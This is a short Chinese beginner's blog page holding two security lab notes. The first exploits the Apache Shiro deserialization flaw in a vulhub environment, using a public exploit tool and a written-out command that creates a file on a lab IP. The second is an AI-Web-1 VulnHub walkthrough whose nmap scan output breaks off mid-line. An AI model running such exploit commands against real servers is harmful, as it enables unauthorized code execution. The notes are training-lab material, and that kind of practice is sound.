初学者L_言的博客

一、环境 1.1 环境搭建 vulhub搭建 【注： 此博客只做学习记录，原理请自行百度**】** 这里贴一篇吧 1.2 工具 python版本：https://github.com/insightglacier/Shiro_exploit 二、操作记录 2.1 执行 touch 命令 # 在 /tmp 目录下 创建 test.txt python2 shiro_exploit.py -t 3 -u http://192.168.47.162:8080 -p "touch /tmp/test.txt"

一、环境 靶机: https://www.vulnhub.com/entry/ai-web-1,353/ 攻击机: kali 二、具体步骤 2.1 主机发现 nmap -sP ip段 2.2 端口服务扫描 nmap -sV -A -p- 192.168.47.152 Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd | http-robots.txt: 2 disal